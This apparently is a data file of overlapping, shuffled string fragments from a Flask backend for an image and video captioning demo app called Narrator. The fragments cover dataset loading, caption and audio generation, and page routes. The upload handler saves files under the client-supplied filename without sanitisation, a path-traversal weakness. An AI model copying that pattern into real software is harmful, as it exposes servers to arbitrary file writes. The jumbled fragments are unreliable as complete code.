"= pd.DataFrame( columns=['id', 'caption', 'gt'], index=['name']).head() # Update any existing samples if len(app.config['SAMPLES_TO_UPDATE'])",
"and \\ filename.rsplit('.', 1)[1] in app.config['ALLOWED_EXTENSIONS'] def save_file(file): \"\"\"Save given file and return",
"allowed extension.\"\"\" return '.' in filename and \\ filename.rsplit('.', 1)[1] in app.config['ALLOWED_EXTENSIONS'] def",
"im_id) in enumerate(zip(im_names, rand_im_ids)): # Get image and generated caption url = coco.loadImgs(im_id)[0]['coco_url']",
"narrator.gen_caption( scene_example_file + '.mp4', by_scene=True, as_string=True) # Create dataframe sceneSamplesDF = pd.DataFrame({ 'time':",
"# Load samples IM_SAMPLES_DICT = [[], [], [], []] VID_SAMPLES_DICT = [[], [],",
"x.capitalize()) # Generate audio files for each caption for i, caption in enumerate(captions):",
"}) print(\"Samples loaded\") # Get filepath for scene example scene_example_file = app.config[ 'SAMPLES_DIR']",
"'gt'] = gt print('Images updated!') for i, (name, vid_id) in enumerate(zip(vid_names, rand_vid_ids)): #",
"audio files for each caption for i, caption in enumerate(captions): narrator.gen_audio_file( caption, scene_example_file",
"coco = COCO(app.config[ 'COCOAPI_PATH'] + 'annotations/instances_{}.json'.format(app.config['COCO_SET'])) cocoCaptionDF = pd.read_csv( app.config['COCOAPI_PATH'] + 'annotations/coco_captions.csv') msrvttCaptionDF",
"x in rand_vid_ids if x not in samplesDF['id'].values.tolist()][ :len(vid_names)] # Generate sample information",
"'.ogg') # Save samples dataframe sceneSamplesDF.to_csv(scene_example_file + '.csv', index=False) # Load samples dataframe",
"= coco.loadImgs(im_id)[0]['coco_url'] caption = narrator.gen_caption(url, beam_size=8) # Get all gt captions and encode/decode",
"for x in app.config['SAMPLES_TO_UPDATE'] if 'video' in x] # Randomly select ids from",
"in rand_vid_ids if x not in samplesDF['id'].values.tolist()][ :len(vid_names)] # Generate sample information and",
"# Update samples dataframe samplesDF.loc[name, 'id'] = im_id samplesDF.loc[name, 'caption'] = caption samplesDF.loc[name,",
"gts.apply(lambda x: narrator.msrvtt_vocab.decode(x, clean=True)) # Find the nearest gt nearest_gt = '' best_score",
"+ str(i) + '.ogg') scenes_dict.append({ 'time': time_codes[i], 'cap_audio': filename + '.' + str(i)",
"caption.capitalize() }) session['scenes_dict'] = scenes_dict return redirect(url_for('uploaded_file', filename=file.filename, typ='scene', caption='scene', cap_audio='scene')) except KeyError",
"directory.\"\"\" return send_from_directory(app.config['UPLOAD_DIR'], filename) @app.route('/samples/<filename>') def get_sample(filename): \"\"\"Get path to file in samples",
"if a file has an allowed extension.\"\"\" return '.' in filename and \\",
"to update im_names = [x for x in app.config['SAMPLES_TO_UPDATE'] if 'image' in x]",
"sceneSamplesDF[ 'caption'].apply(lambda x: x.capitalize()) # Generate audio files for each caption for i,",
"cap_audio=cap_audio, caption=caption, typ=typ)) # Generate caption/audio by scene and redirect to demo_output #",
"Update samples dataframe samplesDF.loc[name, 'id'] = im_id samplesDF.loc[name, 'caption'] = caption samplesDF.loc[name, 'gt']",
"app.config['MAX_LEN'] + 1)) gts = gts.apply(lambda x: narrator.msrvtt_vocab.decode(x, clean=True)) # Find the nearest",
"beam_size=app.config['BEAM_SIZE'], as_string=True, by_scene=by_scene).capitalize() cap_audio = filename + '.ogg' narrator.gen_audio_file( caption, app.config['UPLOAD_DIR'] + cap_audio)",
"import Narrator # Construct classes narrator = Narrator( root_path=app.config['ROOT_PATH'], coco_vocab_path=app.config['COCO_VOCAB_PATH'], msrvtt_vocab_path=app.config['MSRVTT_VOCAB_PATH'], base_model=app.config['ENCODER_MODEL'], ic_model_path=app.config['IC_MODEL_PATH'],",
"file_path def split_filename(file): \"\"\"Split filename into name and ext.\"\"\" *filename, ext = file.filename.split('.')",
"file and return path.\"\"\" file_path = os.path.join(app.config['UPLOAD_DIR'], file.filename) file.save(os.path.join(app.config['UPLOAD_DIR'], file.filename)) return file_path def",
"filename=file.filename, typ='scene', caption='scene', cap_audio='scene')) except KeyError as e: print(e) return render_template('demo_output.html', filename=filename, typ=typ,",
"name + '_gt.ogg') narrator.gen_audio_file( caption, app.config['SAMPLES_DIR'] + name + '.ogg') # Update samples",
"from flask import render_template, request, redirect, url_for, send_from_directory, session from app import app",
"gt = ' '.join(nearest_gt).capitalize() caption = ' '.join(caption).capitalize() # Copy image to samples",
"+ '_gt.ogg', 'caption': vid_sample['caption'], 'cap_audio': 'video' + str(ix) + '.ogg' }) print(\"Samples loaded\")",
"page.\"\"\" # Check if file is uploaded if request.method == 'POST': try: #",
"file in upload directory.\"\"\" return send_from_directory(app.config['UPLOAD_DIR'], filename) @app.route('/samples/<filename>') def get_sample(filename): \"\"\"Get path to",
"return send_from_directory(app.config['UPLOAD_DIR'], filename) @app.route('/samples/<filename>') def get_sample(filename): \"\"\"Get path to file in samples directory.\"\"\"",
"image and generated caption url = coco.loadImgs(im_id)[0]['coco_url'] caption = narrator.gen_caption(url, beam_size=8) # Get",
"and return path.\"\"\" file_path = os.path.join(app.config['UPLOAD_DIR'], file.filename) file.save(os.path.join(app.config['UPLOAD_DIR'], file.filename)) return file_path def split_filename(file):",
"ext in app.config['VID_EXTENSIONS']: if by_scene: return 'scene' return 'video' return 'image' def generate_caption(file,",
"return file_path def split_filename(file): \"\"\"Split filename into name and ext.\"\"\" *filename, ext =",
"for scene example scene_example_file = app.config[ 'SAMPLES_DIR'] + app.config['SCENE_EXAMPLE_FILE'] # Create scene example",
"into name and ext.\"\"\" *filename, ext = file.filename.split('.') if isinstance(filename, list): filename =",
"+ str(ix) + '_gt.ogg', 'caption': vid_sample['caption'], 'cap_audio': 'video' + str(ix) + '.ogg' })",
"'.ogg') scenes_dict.append({ 'time': time_codes[i], 'cap_audio': filename + '.' + str(i) + '.ogg', 'caption':",
"Check if filetype is allowed if file and allowed_file(file.filename): # Fix filename, save",
"= gt print('Images updated!') for i, (name, vid_id) in enumerate(zip(vid_names, rand_vid_ids)): # Get",
"file.filename = file.filename.replace(' ', '_') @app.route('/') @app.route('/index') def index(): \"\"\"Render homepage.\"\"\" return render_template('main.html',",
"'.join(nearest_gt).capitalize() caption = ' '.join(caption).capitalize() # Load and save imge im = PIL.Image.fromarray(io.imread(url)).convert('RGB')",
"VID_SAMPLES_DICT = [[], [], [], []] for i, ix in enumerate(range(16)): im_sample =",
"ext = file.filename.split('.') if isinstance(filename, list): filename = '_'.join(filename) # Replace existing .",
"homepage.\"\"\" return render_template('main.html', page='main', title=app.config['TITLE']) @app.route('/images') def images(): \"\"\"Render image examples page.\"\"\" return",
"print(e) return render_template('demo_output.html', filename=filename, typ=typ, caption=caption, cap_audio=cap_audio, page='demo', title=app.config['TITLE']) @app.route('/uploads/<filename>') def get_upload(filename): \"\"\"Get",
"caption url = app.config['MSRVTT_DATA_PATH'] + vid_id + '.mp4' caption = narrator.gen_caption(url, beam_size=8) #",
"from Narrator import Narrator # Construct classes narrator = Narrator( root_path=app.config['ROOT_PATH'], coco_vocab_path=app.config['COCO_VOCAB_PATH'], msrvtt_vocab_path=app.config['MSRVTT_VOCAB_PATH'],",
"> 0: # Load image and video datasets coco = COCO(app.config[ 'COCOAPI_PATH'] +",
"to demo_output page if not by_scene: caption = narrator.gen_caption(file_path, beam_size=app.config['BEAM_SIZE'], as_string=True, by_scene=by_scene).capitalize() cap_audio",
"if not os.path.exists(scene_example_file + '.csv'): # Generate captions by scene captions, scene_change_timecodes =",
"caption, app.config['SAMPLES_DIR'] + name + '.ogg') # Update samples dataframe samplesDF.loc[name, 'id'] =",
"_ return filename, ext def determine_type(ext, by_scene): \"\"\"Determine if image or video.\"\"\" if",
"'' best_score = 0.0 for gt in gts: bleu = narrator.msrvtt_vocab.evaluate([gt], caption) if",
"as_string=True) # Create dataframe sceneSamplesDF = pd.DataFrame({ 'time': scene_change_timecodes, 'caption': captions }) #",
"+ str(ix) + '.jpg', 'gt': im_sample['gt'], 'gt_audio': 'image' + str(ix) + '_gt.ogg', 'caption':",
"in app.config['SAMPLES_TO_UPDATE'] if 'video' in x] # Randomly select ids from their respective",
"typ=typ, caption=caption, cap_audio=cap_audio, page='demo', title=app.config['TITLE']) @app.route('/uploads/<filename>') def get_upload(filename): \"\"\"Get path to file in",
"+ '.csv') # Load scene example SCENE_SAMPLES_DICT = [] for i, row in",
"\"\"\"Render image examples page.\"\"\" return render_template('images.html', im_dict=IM_SAMPLES_DICT, page='images', title=app.config['TITLE']) @app.route('/videos') def videos(): \"\"\"Render",
"nearest_gt = '' best_score = 0.0 for gt in gts: bleu = narrator.msrvtt_vocab.evaluate([gt],",
"determine type file.filename = file.filename.replace(' ', '_') file_path = save_file(file) filename, ext =",
"samples dataframe samplesDF.to_csv(app.config['SAMPLES_DIR'] + 'sample_captions.csv') # Load samples IM_SAMPLES_DICT = [[], [], [],",
"in samplesDF['id'].values.tolist()][ :len(im_names)] rand_vid_ids = msrvttCaptionDF[msrvttCaptionDF['set'] == 'test'].sample(n=32)[ 'vid_id'].values.tolist() rand_vid_ids = [x for",
"\"\"\"Determine if image or video.\"\"\" if ext in app.config['VID_EXTENSIONS']: if by_scene: return 'scene'",
"and store to file for i, (name, im_id) in enumerate(zip(im_names, rand_im_ids)): # Get",
"x not in samplesDF['id'].values.tolist()][ :len(vid_names)] # Generate sample information and store to file",
"def about(): \"\"\"Render about page.\"\"\" return render_template('about.html', page='about', title=app.config['TITLE']) @app.route('/demo', methods=['GET', 'POST']) def",
"about page.\"\"\" return render_template('about.html', page='about', title=app.config['TITLE']) @app.route('/demo', methods=['GET', 'POST']) def demo(): \"\"\"Render demo",
"file.filename.replace(' ', '_') @app.route('/') @app.route('/index') def index(): \"\"\"Render homepage.\"\"\" return render_template('main.html', page='main', title=app.config['TITLE'])",
"page.\"\"\" return render_template('images.html', im_dict=IM_SAMPLES_DICT, page='images', title=app.config['TITLE']) @app.route('/videos') def videos(): \"\"\"Render video examples page.\"\"\"",
"samples IM_SAMPLES_DICT = [[], [], [], []] VID_SAMPLES_DICT = [[], [], [], []]",
"# Fix filename, save to file, get ext and determine type file.filename =",
"+ 'PythonAPI') from pycocotools.coco import COCO sys.path.append('../src/') from Narrator import Narrator # Construct",
"upload directory.\"\"\" return send_from_directory(app.config['UPLOAD_DIR'], filename) @app.route('/samples/<filename>') def get_sample(filename): \"\"\"Get path to file in",
"file\"\"\" file.filename = file.filename.replace(' ', '_') @app.route('/') @app.route('/index') def index(): \"\"\"Render homepage.\"\"\" return",
"\"\"\" Backend of Narrator web app. \"\"\" import os import sys import shutil",
"# Get image and generated caption url = coco.loadImgs(im_id)[0]['coco_url'] caption = narrator.gen_caption(url, beam_size=8)",
"app.config['SAMPLES_DIR'] + 'sample_captions.csv', index_col=0) except: samplesDF = pd.DataFrame( columns=['id', 'caption', 'gt'], index=['name']).head() #",
"generated caption url = coco.loadImgs(im_id)[0]['coco_url'] caption = narrator.gen_caption(url, beam_size=8) # Get all gt",
"print('Videos updated!') # Save samples dataframe samplesDF.to_csv(app.config['SAMPLES_DIR'] + 'sample_captions.csv') # Load samples IM_SAMPLES_DICT",
"samplesDF.loc['video' + str(ix)] IM_SAMPLES_DICT[int(i / 4)].append({ 'id': im_sample['id'], 'url': 'image' + str(ix) +",
"'gt': im_sample['gt'], 'gt_audio': 'image' + str(ix) + '_gt.ogg', 'caption': im_sample['caption'], 'cap_audio': 'image' +",
"# Save samples dataframe samplesDF.to_csv(app.config['SAMPLES_DIR'] + 'sample_captions.csv') # Load samples IM_SAMPLES_DICT = [[],",
"'POST']) def uploaded_file(filename, typ='image', caption=\"\", cap_audio=None): \"\"\"Render demo output page.\"\"\" # Duplicate of",
"= app.config['MSRVTT_DATA_PATH'] + vid_id + '.mp4' caption = narrator.gen_caption(url, beam_size=8) # Get all",
"'gt_audio': 'image' + str(ix) + '_gt.ogg', 'caption': im_sample['caption'], 'cap_audio': 'image' + str(ix) +",
"'.join(caption).capitalize() # Load and save imge im = PIL.Image.fromarray(io.imread(url)).convert('RGB') im.save(app.config['SAMPLES_DIR'] + name +",
"base_model=app.config['ENCODER_MODEL'], ic_model_path=app.config['IC_MODEL_PATH'], vc_model_path=app.config['VC_MODEL_PATH'], ic_rnn_type=app.config['IC_RNN_TYPE'], vc_rnn_type=app.config['VC_RNN_TYPE'] ) # Load samples from file try: samplesDF",
"'.ogg' }) print(\"Samples loaded\") # Get filepath for scene example scene_example_file = app.config[",
"by_scene: return 'scene' return 'video' return 'image' def generate_caption(file, by_scene): \"\"\"Generate caption for",
"@app.route('/contact') def contact(): \"\"\"Render contact me page.\"\"\" return render_template('contact.html', page='contact', title=app.config['TITLE']) @app.route('/about') def",
"Determine images and videos to update im_names = [x for x in app.config['SAMPLES_TO_UPDATE']",
"and redirect to demo_output page if not by_scene: caption = narrator.gen_caption(file_path, beam_size=app.config['BEAM_SIZE'], as_string=True,",
"Load samples IM_SAMPLES_DICT = [[], [], [], []] VID_SAMPLES_DICT = [[], [], [],",
"examples page.\"\"\" return render_template('images.html', im_dict=IM_SAMPLES_DICT, page='images', title=app.config['TITLE']) @app.route('/videos') def videos(): \"\"\"Render video examples",
"# Generate caption/audio and redirect to demo_output page if not by_scene: caption =",
"for gt in gts: bleu = narrator.msrvtt_vocab.evaluate([gt], caption) if bleu > best_score: best_score",
"i, (name, vid_id) in enumerate(zip(vid_names, rand_vid_ids)): # Get video and generated caption url",
"uploaded_file(filename, typ='image', caption=\"\", cap_audio=None): \"\"\"Render demo output page.\"\"\" # Duplicate of above --",
"gts: bleu = narrator.msrvtt_vocab.evaluate([gt], caption) if bleu > best_score: best_score = bleu nearest_gt",
"filename + '.' + str(i) + '.ogg', 'caption': caption.capitalize() }) session['scenes_dict'] = scenes_dict",
"Copy image to samples directory shutil.copy(url, app.config['SAMPLES_DIR'] + name + '.mp4') # Generate",
"get ext and determine type file.filename = file.filename.replace(' ', '_') file_path = save_file(file)",
"samples if len(app.config['SAMPLES_TO_UPDATE']) > 0: # Load image and video datasets coco =",
"shutil.copy(url, app.config['SAMPLES_DIR'] + name + '.mp4') # Generate audio files narrator.gen_audio_file( gt, app.config['SAMPLES_DIR']",
"'.ogg') # update samples dataframe samplesDF.loc[name, 'id'] = vid_id samplesDF.loc[name, 'caption'] = caption",
"samples dataframe else: sceneSamplesDF = pd.read_csv(scene_example_file + '.csv') # Load scene example SCENE_SAMPLES_DICT",
"'.ogg', 'caption': row['caption'].capitalize() }) ############################################################################## ##################################### APP #################################### ############################################################################## def allowed_file(filename): \"\"\"Determine if",
"x: narrator.msrvtt_vocab.encode( x, app.config['MAX_LEN'] + 1)) gts = gts.apply(lambda x: narrator.msrvtt_vocab.decode(x, clean=True)) #",
"'test'].sample(n=32)[ 'vid_id'].values.tolist() rand_vid_ids = [x for x in rand_vid_ids if x not in",
"= gts.apply(lambda x: narrator.msrvtt_vocab.decode(x, clean=True)) # Find the nearest gt nearest_gt = ''",
"narrator = Narrator( root_path=app.config['ROOT_PATH'], coco_vocab_path=app.config['COCO_VOCAB_PATH'], msrvtt_vocab_path=app.config['MSRVTT_VOCAB_PATH'], base_model=app.config['ENCODER_MODEL'], ic_model_path=app.config['IC_MODEL_PATH'], vc_model_path=app.config['VC_MODEL_PATH'], ic_rnn_type=app.config['IC_RNN_TYPE'], vc_rnn_type=app.config['VC_RNN_TYPE'] ) #",
"', '_') @app.route('/') @app.route('/index') def index(): \"\"\"Render homepage.\"\"\" return render_template('main.html', page='main', title=app.config['TITLE']) @app.route('/images')",
"= [x for x in app.config['SAMPLES_TO_UPDATE'] if 'video' in x] # Randomly select",
"'time': row['time'], 'cap_audio': app.config['SCENE_EXAMPLE_FILE'] + '.' + str(i) + '.ogg', 'caption': row['caption'].capitalize() })",
"return render_template('main.html', page='main', title=app.config['TITLE']) @app.route('/images') def images(): \"\"\"Render image examples page.\"\"\" return render_template('images.html',",
"ext = split_filename(file) typ = determine_type(ext, by_scene) if typ == 'image': by_scene =",
"# Generate sample information and store to file for i, (name, im_id) in",
"file_path = os.path.join(app.config['UPLOAD_DIR'], file.filename) file.save(os.path.join(app.config['UPLOAD_DIR'], file.filename)) return file_path def split_filename(file): \"\"\"Split filename into",
"for i, ix in enumerate(range(16)): im_sample = samplesDF.loc['image' + str(ix)] vid_sample = samplesDF.loc['video'",
"+ '.jpg', 'gt': im_sample['gt'], 'gt_audio': 'image' + str(ix) + '_gt.ogg', 'caption': im_sample['caption'], 'cap_audio':",
"try: samplesDF = pd.read_csv( app.config['SAMPLES_DIR'] + 'sample_captions.csv', index_col=0) except: samplesDF = pd.DataFrame( columns=['id',",
"not in samplesDF['id'].values.tolist()][ :len(im_names)] rand_vid_ids = msrvttCaptionDF[msrvttCaptionDF['set'] == 'test'].sample(n=32)[ 'vid_id'].values.tolist() rand_vid_ids = [x",
"vid_sample['caption'], 'cap_audio': 'video' + str(ix) + '.ogg' }) print(\"Samples loaded\") # Get filepath",
"= scenes_dict return redirect(url_for('uploaded_file', filename=file.filename, typ='scene', caption='scene', cap_audio='scene')) except KeyError as e: print(e)",
"except KeyError as e: print(e) return render_template('demo_output.html', filename=filename, typ=typ, caption=caption, cap_audio=cap_audio, page='demo', title=app.config['TITLE'])",
"x, app.config['MAX_LEN'] + 1)) gts = gts.apply(lambda x: narrator.msrvtt_vocab.decode(x, clean=True)) # Find the",
"all gt captions and encode/decode using vocabulary gts = cocoCaptionDF[cocoCaptionDF['id'] == im_id]['caption'] gts",
"'.mp4' caption = narrator.gen_caption(url, beam_size=8) # Get all gt captions and encode/decode using",
"files for each caption for i, caption in enumerate(captions): narrator.gen_audio_file( caption, scene_example_file +",
"app.config['SCENE_EXAMPLE_FILE'] + '.' + str(i) + '.ogg', 'caption': row['caption'].capitalize() }) ############################################################################## ##################################### APP",
"= narrator.coco_vocab.evaluate([gt], caption) if bleu > best_score: best_score = bleu nearest_gt = gt",
"x] vid_names = [x for x in app.config['SAMPLES_TO_UPDATE'] if 'video' in x] #",
"'caption': row['caption'].capitalize() }) ############################################################################## ##################################### APP #################################### ############################################################################## def allowed_file(filename): \"\"\"Determine if a",
"im = PIL.Image.fromarray(io.imread(url)).convert('RGB') im.save(app.config['SAMPLES_DIR'] + name + '.jpg') # Generate audio files narrator.gen_audio_file(",
"allowed_file(file.filename): # Fix filename, save to file, get ext and determine type file.filename",
"gts = gts.apply(lambda x: narrator.coco_vocab.encode( x, app.config['MAX_LEN'] + 1)) gts = gts.apply(lambda x:",
"rand_vid_ids)): # Get video and generated caption url = app.config['MSRVTT_DATA_PATH'] + vid_id +",
"filename=filename, typ=typ, caption=caption, cap_audio=cap_audio, page='demo', title=app.config['TITLE']) @app.route('/uploads/<filename>') def get_upload(filename): \"\"\"Get path to file",
"pd.DataFrame( columns=['id', 'caption', 'gt'], index=['name']).head() # Update any existing samples if len(app.config['SAMPLES_TO_UPDATE']) >",
"gts = cocoCaptionDF[cocoCaptionDF['id'] == im_id]['caption'] gts = gts.apply(lambda x: narrator.coco_vocab.encode( x, app.config['MAX_LEN'] +",
"name + '.jpg') # Generate audio files narrator.gen_audio_file( gt, app.config['SAMPLES_DIR'] + name +",
"captions, time_codes = narrator.gen_caption(file_path, beam_size=app.config[ 'BEAM_SIZE'], as_string=True, by_scene=by_scene) scenes_dict = [] for i,",
"and ext.\"\"\" *filename, ext = file.filename.split('.') if isinstance(filename, list): filename = '_'.join(filename) #",
"Narrator web app. \"\"\" import os import sys import shutil import pandas as",
"not in samplesDF['id'].values.tolist()][ :len(vid_names)] # Generate sample information and store to file for",
"if request.method == 'POST': try: # Grab file, and if by_scene is requested",
"x in app.config['SAMPLES_TO_UPDATE'] if 'video' in x] # Randomly select ids from their",
"coco_vocab_path=app.config['COCO_VOCAB_PATH'], msrvtt_vocab_path=app.config['MSRVTT_VOCAB_PATH'], base_model=app.config['ENCODER_MODEL'], ic_model_path=app.config['IC_MODEL_PATH'], vc_model_path=app.config['VC_MODEL_PATH'], ic_rnn_type=app.config['IC_RNN_TYPE'], vc_rnn_type=app.config['VC_RNN_TYPE'] ) # Load samples from file",
"x: narrator.msrvtt_vocab.decode(x, clean=True)) # Find the nearest gt nearest_gt = '' best_score =",
"gts.apply(lambda x: narrator.coco_vocab.encode( x, app.config['MAX_LEN'] + 1)) gts = gts.apply(lambda x: narrator.coco_vocab.decode(x, clean=True))",
"file = request.files['file'] by_scene = 'by_scene' in request.form # Check if filetype is",
"as e: print(e) return render_template('demo.html', page='demo', title=app.config['TITLE']) @app.route('/demo/<filename>&<cap_audio>&<typ>&<caption>', methods=['GET', 'POST']) def uploaded_file(filename, typ='image',",
"page.\"\"\" return render_template('scenes.html', page='scenes', scenes_dict=SCENE_SAMPLES_DICT, title=app.config['TITLE']) @app.route('/contact') def contact(): \"\"\"Render contact me page.\"\"\"",
"scenes_dict return redirect(url_for('uploaded_file', filename=file.filename, typ='scene', caption='scene', cap_audio='scene')) except KeyError as e: print(e) return",
"Narrator( root_path=app.config['ROOT_PATH'], coco_vocab_path=app.config['COCO_VOCAB_PATH'], msrvtt_vocab_path=app.config['MSRVTT_VOCAB_PATH'], base_model=app.config['ENCODER_MODEL'], ic_model_path=app.config['IC_MODEL_PATH'], vc_model_path=app.config['VC_MODEL_PATH'], ic_rnn_type=app.config['IC_RNN_TYPE'], vc_rnn_type=app.config['VC_RNN_TYPE'] ) # Load samples",
"# Create scene example if it doesn't already exist if not os.path.exists(scene_example_file +",
"by_scene): \"\"\"Generate caption for given file\"\"\" file.filename = file.filename.replace(' ', '_') @app.route('/') @app.route('/index')",
"return 'video' return 'image' def generate_caption(file, by_scene): \"\"\"Generate caption for given file\"\"\" file.filename",
"im_sample['id'], 'url': 'image' + str(ix) + '.jpg', 'gt': im_sample['gt'], 'gt_audio': 'image' + str(ix)",
"= Narrator( root_path=app.config['ROOT_PATH'], coco_vocab_path=app.config['COCO_VOCAB_PATH'], msrvtt_vocab_path=app.config['MSRVTT_VOCAB_PATH'], base_model=app.config['ENCODER_MODEL'], ic_model_path=app.config['IC_MODEL_PATH'], vc_model_path=app.config['VC_MODEL_PATH'], ic_rnn_type=app.config['IC_RNN_TYPE'], vc_rnn_type=app.config['VC_RNN_TYPE'] ) # Load",
"i, ix in enumerate(range(16)): im_sample = samplesDF.loc['image' + str(ix)] vid_sample = samplesDF.loc['video' +",
"return render_template('scenes.html', page='scenes', scenes_dict=SCENE_SAMPLES_DICT, title=app.config['TITLE']) @app.route('/contact') def contact(): \"\"\"Render contact me page.\"\"\" return",
"flask import render_template, request, redirect, url_for, send_from_directory, session from app import app sys.path.append(app.config['COCOAPI_PATH']",
"vc_model_path=app.config['VC_MODEL_PATH'], ic_rnn_type=app.config['IC_RNN_TYPE'], vc_rnn_type=app.config['VC_RNN_TYPE'] ) # Load samples from file try: samplesDF = pd.read_csv(",
"############################################################################## def allowed_file(filename): \"\"\"Determine if a file has an allowed extension.\"\"\" return '.'",
"demo page.\"\"\" # Check if file is uploaded if request.method == 'POST': try:",
"generate_caption(file, by_scene): \"\"\"Generate caption for given file\"\"\" file.filename = file.filename.replace(' ', '_') @app.route('/')",
"skimage.io as io import PIL from flask import render_template, request, redirect, url_for, send_from_directory,",
"+ str(ix) + '.ogg' }) VID_SAMPLES_DICT[int(i / 4)].append({ 'id': vid_sample['id'], 'url': 'video' +",
"im_sample = samplesDF.loc['image' + str(ix)] vid_sample = samplesDF.loc['video' + str(ix)] IM_SAMPLES_DICT[int(i / 4)].append({",
"sceneSamplesDF.to_csv(scene_example_file + '.csv', index=False) # Load samples dataframe else: sceneSamplesDF = pd.read_csv(scene_example_file +",
"gts = gts.apply(lambda x: narrator.msrvtt_vocab.decode(x, clean=True)) # Find the nearest gt nearest_gt =",
"False # Generate caption/audio and redirect to demo_output page if not by_scene: caption",
"= filename + '.ogg' narrator.gen_audio_file( caption, app.config['UPLOAD_DIR'] + cap_audio) return redirect(url_for('uploaded_file', filename=file.filename, cap_audio=cap_audio,",
"return redirect(url_for('uploaded_file', filename=file.filename, cap_audio=cap_audio, caption=caption, typ=typ)) # Generate caption/audio by scene and redirect",
"except KeyError as e: print(e) return render_template('demo.html', page='demo', title=app.config['TITLE']) @app.route('/demo/<filename>&<cap_audio>&<typ>&<caption>', methods=['GET', 'POST']) def",
"not by_scene: caption = narrator.gen_caption(file_path, beam_size=app.config[ 'BEAM_SIZE'], as_string=True, by_scene=by_scene).capitalize() cap_audio = filename +",
"demo_output # page captions, time_codes = narrator.gen_caption(file_path, beam_size=app.config[ 'BEAM_SIZE'], as_string=True, by_scene=by_scene) scenes_dict =",
"'SAMPLES_DIR'] + app.config['SCENE_EXAMPLE_FILE'] # Create scene example if it doesn't already exist if",
"from their respective datasets and reject any that already have been # chosen",
"= gt gt = ' '.join(nearest_gt).capitalize() caption = ' '.join(caption).capitalize() # Copy image",
"'annotations/instances_{}.json'.format(app.config['COCO_SET'])) cocoCaptionDF = pd.read_csv( app.config['COCOAPI_PATH'] + 'annotations/coco_captions.csv') msrvttCaptionDF = pd.read_csv(app.config['MSRVTT_CAPTION_PATH']) # Determine images",
"been # chosen rand_im_ids = cocoCaptionDF[cocoCaptionDF['set'] == app.config[ 'COCO_SET']].sample(n=32)['id'].values.tolist() rand_im_ids = [x for",
") # Load samples from file try: samplesDF = pd.read_csv( app.config['SAMPLES_DIR'] + 'sample_captions.csv',",
"Create dataframe sceneSamplesDF = pd.DataFrame({ 'time': scene_change_timecodes, 'caption': captions }) # Capitalize sceneSamplesDF['caption']",
"+ name + '.ogg') # Update samples dataframe samplesDF.loc[name, 'id'] = im_id samplesDF.loc[name,",
"Narrator # Construct classes narrator = Narrator( root_path=app.config['ROOT_PATH'], coco_vocab_path=app.config['COCO_VOCAB_PATH'], msrvtt_vocab_path=app.config['MSRVTT_VOCAB_PATH'], base_model=app.config['ENCODER_MODEL'], ic_model_path=app.config['IC_MODEL_PATH'], vc_model_path=app.config['VC_MODEL_PATH'],",
"Load samples from file try: samplesDF = pd.read_csv( app.config['SAMPLES_DIR'] + 'sample_captions.csv', index_col=0) except:",
"= [] for i, row in sceneSamplesDF.iterrows(): SCENE_SAMPLES_DICT.append({ 'time': row['time'], 'cap_audio': app.config['SCENE_EXAMPLE_FILE'] +",
"+ str(i) + '.ogg', 'caption': row['caption'].capitalize() }) ############################################################################## ##################################### APP #################################### ############################################################################## def",
"title=app.config['TITLE']) @app.route('/images') def images(): \"\"\"Render image examples page.\"\"\" return render_template('images.html', im_dict=IM_SAMPLES_DICT, page='images', title=app.config['TITLE'])",
"# Check if file is uploaded if request.method == 'POST': try: # Grab",
"'.jpg', 'gt': im_sample['gt'], 'gt_audio': 'image' + str(ix) + '_gt.ogg', 'caption': im_sample['caption'], 'cap_audio': 'image'",
"narrator.gen_audio_file( caption, scene_example_file + '.' + str(i) + '.ogg') # Save samples dataframe",
"request.files['file'] by_scene = 'by_scene' in request.form # Check if filetype is allowed if",
"caption = ' '.join(caption).capitalize() # Copy image to samples directory shutil.copy(url, app.config['SAMPLES_DIR'] +",
"as pd import skimage.io as io import PIL from flask import render_template, request,",
"+ 'sample_captions.csv', index_col=0) except: samplesDF = pd.DataFrame( columns=['id', 'caption', 'gt'], index=['name']).head() # Update",
"im_id samplesDF.loc[name, 'caption'] = caption samplesDF.loc[name, 'gt'] = gt print('Images updated!') for i,",
"'sample_captions.csv') # Load samples IM_SAMPLES_DICT = [[], [], [], []] VID_SAMPLES_DICT = [[],",
"best_score: best_score = bleu nearest_gt = gt gt = ' '.join(nearest_gt).capitalize() caption =",
"+ str(ix) + '.mp4', 'gt': vid_sample['gt'], 'gt_audio': 'video' + str(ix) + '_gt.ogg', 'caption':",
"select ids from their respective datasets and reject any that already have been",
"+ '.ogg', 'caption': row['caption'].capitalize() }) ############################################################################## ##################################### APP #################################### ############################################################################## def allowed_file(filename): \"\"\"Determine",
"def allowed_file(filename): \"\"\"Determine if a file has an allowed extension.\"\"\" return '.' in",
"def get_upload(filename): \"\"\"Get path to file in upload directory.\"\"\" return send_from_directory(app.config['UPLOAD_DIR'], filename) @app.route('/samples/<filename>')",
"gt = ' '.join(nearest_gt).capitalize() caption = ' '.join(caption).capitalize() # Load and save imge",
"app.config['SAMPLES_TO_UPDATE'] if 'image' in x] vid_names = [x for x in app.config['SAMPLES_TO_UPDATE'] if",
"gts = gts.apply(lambda x: narrator.msrvtt_vocab.encode( x, app.config['MAX_LEN'] + 1)) gts = gts.apply(lambda x:",
"narrator.gen_caption(file_path, beam_size=app.config[ 'BEAM_SIZE'], as_string=True, by_scene=by_scene) scenes_dict = [] for i, caption in enumerate(captions):",
"redirect to demo_output page if not by_scene: caption = narrator.gen_caption(file_path, beam_size=app.config[ 'BEAM_SIZE'], as_string=True,",
"to file in upload directory.\"\"\" return send_from_directory(app.config['UPLOAD_DIR'], filename) @app.route('/samples/<filename>') def get_sample(filename): \"\"\"Get path",
"'_'.join(filename) # Replace existing . with _ return filename, ext def determine_type(ext, by_scene):",
"samplesDF.loc['image' + str(ix)] vid_sample = samplesDF.loc['video' + str(ix)] IM_SAMPLES_DICT[int(i / 4)].append({ 'id': im_sample['id'],",
"+ '.ogg' narrator.gen_audio_file( caption, app.config['UPLOAD_DIR'] + cap_audio) return redirect(url_for('uploaded_file', filename=file.filename, cap_audio=cap_audio, caption=caption, typ=typ))",
"'.ogg', 'caption': caption.capitalize() }) session['scenes_dict'] = scenes_dict return redirect(url_for('uploaded_file', filename=file.filename, typ='scene', caption='scene', cap_audio='scene'))",
"app import app sys.path.append(app.config['COCOAPI_PATH'] + 'PythonAPI') from pycocotools.coco import COCO sys.path.append('../src/') from Narrator",
"narrator.coco_vocab.evaluate([gt], caption) if bleu > best_score: best_score = bleu nearest_gt = gt gt",
